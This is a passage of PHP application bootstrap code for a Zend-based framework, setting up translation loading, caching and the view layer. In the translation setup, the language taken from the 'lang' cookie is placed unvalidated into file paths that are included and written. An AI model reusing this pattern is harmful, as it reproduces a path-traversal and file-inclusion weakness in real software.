            ->_require('locale')->_require('languages')->_require('modules')->_require('router');
        Singular_Bench::start(__METHOD__, 'Translate bootstrap');

        //$this->router->route($this->frontcontroller->getRequest());
        $cache = $this->cachemanager->getCache('translate');

        // determine proper language
        if (!$language = $cache->load('language_' . $options->languageSource)) {
            switch ($options->languageSource) {
                // is not cacheable
                case 'cookies':
                default:
                    $options->cookie_expire;
                    $currLang = $this->frontcontroller->getRequest()->getParam('lang', $options->defaultLanguage);
                    $baseUrl  = $this->frontcontroller->getBaseUrl();
                    if (false !== strpos($baseUrl, 'http://') || false !== strpos($baseUrl, 'https://') || false !== strpos($baseUrl, 'www.')) {
                        $baseUrl = parse_url($baseUrl, PHP_URL_PATH);
                    }
                    setcookie('lang', $currLang, time() + $options->cookie_expire, empty($baseUrl) ? '/' : $baseUrl);
                    $language = (isset($_COOKIE['lang'])) ? $_COOKIE['lang'] : $options->defaultLanguage;
                    break;

                case 'user_settings':
                    $this->_require('auth');
                    $user         = Singular_Core::_('Auth')->getLoggedUser();
                    $userSettings = Singular_Core::_('UserSettings');
                    if ($userSettings->hasValue('site_default_language', $user)) {
                        $language = $userSettings->getValue('site_default_language', $user);
                    } else {
                        $language = $options->defaultLanguage;
                    }
                    break;

                case 'system_settings':
                    $language = Singular_Core::_('Settings')->get('site_default_language');
                    $cache->save($language, 'language_' . $options->languageSource);
                    break;
            }
        }
        Singular_Runtime::store('language', $language, true);

        if ((bool)$options->options->logUntranslated) {
            $this->_require('log');
            $options->options->log = $this->log;
        }

        $localizationCacheFile = CACHE_PATH . "/localization-cache-{$language}.php";
        if (is_readable($localizationCacheFile)) {
            $translations = include $localizationCacheFile;
        } else {
            /* Process built-in translation */
            $translations    = array();
            $localizationDir = LOCALIZATION_PATH . '/' . $language;
            if (is_readable($localizationDir)) {
                $files = glob($localizationDir . '/*.php');
                if (is_array($files)) {
                    foreach ($files as $file) {
                        $moduleLang = basename($file, '.php');
                        if (in_array($moduleLang, $this->modules)) {
                            $translations = array_merge($translations, include $file);
                        }
                    }
                }
            }

            /* Process user-defined localization */
            $customTranslation = CUSTOM_LOCALIZATION_PATH . "/{$language}/" . Singular_Translate::CUSTOM_LOCALIZATION_FILE;
            if (is_readable($customTranslation) && filesize($customTranslation)) {
                $translations = array_merge($translations, include $customTranslation);
            }

            /* Process modules translation keys */
            $translationKeys = array();
            $jsLangKeys      = array();
            foreach ($this->modules as $module) {
                $moduleLocation = $this->frontcontroller->getModuleDirectory($module);
                $moduleLangFile = $moduleLocation . '/lang.php';
                $jsLangFile     = $moduleLocation . '/langJs.php';
                if (is_readable($jsLangFile)) {
                    $jsLangKeys = array_merge($jsLangKeys, include($jsLangFile));
                }
                if (is_readable($moduleLangFile)) {
                    $translationKeys = array_merge($translationKeys, include $moduleLangFile);
                }
            }

            if (!empty($translationKeys)) {
                $translationKeys = array_combine($translationKeys, $translationKeys);
            }
            $translations = array_merge($translationKeys, $translations);
            $translations = array('all' => $translations, 'js' => $jsLangKeys);

            file_put_contents(
                $localizationCacheFile,
                '<?php' . PHP_EOL . 'return ' . var_export($translations, true) . ';'
            );
        }

        $translate = new Singular_Translate(
            $options->adapter, // Translation adapter
            $translations['all'], // Translation list as key => val
            $language, // Current language
            $options->options->toArray() // Additional adapter options
        );

        if ($options->isDefaultValidateTranslator) {
            Zend_Validate_Abstract::setDefaultTranslator($translate);
        }
        if ($options->isDefaultFormTranslator) {
            Zend_Form::setDefaultTranslator($translate);
        }
        if ($options->isDefaultRouterTranslator) {
            Zend_Controller_Router_Route::setDefaultTranslator($translate);
        }

        Singular_Runtime::store('jsLangKeys', $translations['js']);
        Singular_Runtime::store('Zend_Translate', $translate, true);
        Singular_Bench::finish(__METHOD__);

        return $translate;
    }

    /**
     * Initializes View
     *
     * @param  Zend_Config $options
     * @return Zend_View
     */
    public function initView(Zend_Config $options)
    {
        Singular_Bench::start(__METHOD__, 'View bootstrap');
        $view = new Singular_View($options->toArray());
        Singular_View::setDebug($options->debug);

        $viewRenderer = new Zend_Controller_Action_Helper_ViewRenderer();
        $viewRenderer->setView($view);
        Zend_Controller_Action_HelperBroker::addHelper($viewRenderer);

        if (isset($options->doctype)) {
            $view->doctype()->setDoctype(strtoupper($options->doctype));
        }

        //Zend_Loader_PluginLoader::setIncludeFileCache(CACHE_PATH . '/view-plugin-paths.php');

        Singular_Runtime::store('view', $view, true);
        Singular_Bench::finish(__METHOD__);

        return $view;
    }
}
